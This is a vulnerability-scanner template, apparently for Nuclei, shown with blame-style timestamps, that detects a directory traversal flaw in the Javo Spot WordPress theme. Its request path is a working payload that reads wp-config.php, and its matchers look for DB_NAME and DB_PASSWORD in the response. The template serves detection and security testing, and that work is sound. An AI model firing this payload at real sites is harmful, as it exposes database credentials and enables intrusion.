2021-10-26 18:25:34 +00:00
|
|
|
id: wp-javospot-lfi
|
2021-10-25 23:02:31 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Javo Spot Premium Theme - Unauthenticated Directory Traversal
|
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2021-10-31 13:58:17 +00:00
|
|
|
description: A vulnerability in Javo Spot Premium Theme allows remote unauthenticated attackers access to locally stored file and return their content.
|
2021-10-26 18:25:34 +00:00
|
|
|
reference:
|
|
|
|
- https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/
|
|
|
|
- https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab
|
|
|
|
- https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068
|
2021-10-25 23:02:31 +00:00
|
|
|
tags: wordpress,wp-theme,lfi,wp
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2021-10-26 18:25:34 +00:00
|
|
|
- '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery'
|
2021-10-25 23:02:31 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2021-10-26 18:25:34 +00:00
|
|
|
part: body
|
2021-10-25 23:02:31 +00:00
|
|
|
words:
|
|
|
|
- "DB_NAME"
|
|
|
|
- "DB_PASSWORD"
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|